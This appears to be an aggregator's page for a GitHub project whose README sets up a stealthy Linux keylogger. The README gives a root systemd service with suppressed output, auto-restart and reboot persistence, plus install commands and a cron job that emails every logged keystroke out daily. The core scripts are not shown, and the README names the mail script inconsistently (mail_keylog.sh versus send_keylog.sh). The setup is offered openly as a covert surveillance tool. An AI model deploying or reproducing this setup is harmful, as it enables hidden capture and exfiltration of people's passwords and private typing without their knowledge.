https://github.com/mayanksharma001/stealthlogger
This is a Linux-based keylogger that activates upon startup and operates discreetly in the background. It records every keystroke and saves the data to a file, which is then automatically emailed to the administrator every 24 hours.
https://github.com/mayanksharma001/stealthlogger
bash-scripting keylogger linux logging
Last synced: about 18 hours ago
JSON representation
This is a Linux-based keylogger that activates upon startup and operates discreetly in the background. It records every keystroke and saves the data to a file, which is then automatically emailed to the administrator every 24 hours.
- Host: GitHub
- URL: https://github.com/mayanksharma001/stealthlogger
- Owner: MayankSharma001
- Created: 2025-03-18T10:42:53.000Z (over 1 year ago)
- Default Branch: main
- Last Pushed: 2025-03-19T07:11:50.000Z (over 1 year ago)
- Last Synced: 2025-04-01T07:18:46.027Z (over 1 year ago)
- Topics: bash-scripting, keylogger, linux, logging
- Language: Shell
- Homepage:
- Size: 6.84 KB
- Stars: 0
- Watchers: 1
- Forks: 0
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# Linux Based Persistent Keylogger with mailing
This is a Linux based keylogger which starts at startup and runs in the background. Saves the output of every key stroke in a file and mails the file automatically in every 24 hours cycle to the admin.
## Project Structure
```
/usr/local/bin/
├── keylogger.sh # Main keylogger script (background)
├── mail_keylog.sh # Email script (sends logs daily)
/etc/systemd/system/
├── keylogger.service # Systemd service for persistence
/var/log/keylogger/ # Directory storing keystroke logs
```
## Features
1. Runs in the background silently
2. Logs all keystrokes into a file (/var/log/keylogger/YYYY-MM-DD.log)
3. Persists after reboot (via systemd service)
4. Sends daily logs to admin via email (via cron job)
5. Auto-restarts if stopped
## Installation & Setup
1. Install Dependencies
```
- sudo apt update && sudo apt install evtest mailutils -y #Debian
- sudo yum install evtest mailx -y #RHEL
```
3. Identify the Keyboard Device
```
- sudo evtest
```
- Then check for the keyboard device #Example: /dev/input/event1: AT Translated Set 2 keyboard
- Press keys to check response. Once identified, update /dev/input/eventX in the script.
## Keylogger Script
1. Create the script here: ``` sudo nano /usr/local/bin/keylogger.sh ```
2. Then make it executable with: ``` chmod +x /usr/local/bin/keylogger.sh ```
## Making the Keylogger Persistent
1. Create a systemd service
```
- sudo nano /etc/systemd/system/keylogger.service
```
2. Paste the following:
```
[Unit]
Description=Stealth Linux Keylogger
After=network.target
[Service]
Type=simple
ExecStart=/usr/local/bin/keylogger.sh
Restart=always
User=root
StandardOutput=null
StandardError=null
[Install]
WantedBy=multi-user.target
```
3. Enable and start the service
```
- sudo systemctl daemon-reload
- sudo systemctl enable keylogger
- sudo systemctl start keylogger
```
4. Verify if its running
```
sudo systemctl status keylogger
```
## Emailing the logs every 24 hours with cron jobs
1. Create the email script
```
sudo nano /usr/local/bin/mail_keylog.sh
```
2. Make it executable
```
sudo chmod +x /usr/local/bin/send_keylog.sh
```
3. Schedule the cron job daily at midnight
```
sudo crontab -e
```
Then add the following
```
0 0 * * * /usr/local/bin/mail_keylog.sh
```
4. Restart cron service
```
sudo systemctl restart cron
```
## Further Enhancement
- Making the script immutable – Use chattr +i to prevent any unauthorized modifications to the script.
- Access Control – Restrict access to the script and log files using ACLs (setfacl) to ensure only authorized users can read or modify them.
- Log Integrity Verification – Implement SHA256 hashing for log files, allowing us to verify that the logs have not been tampered with.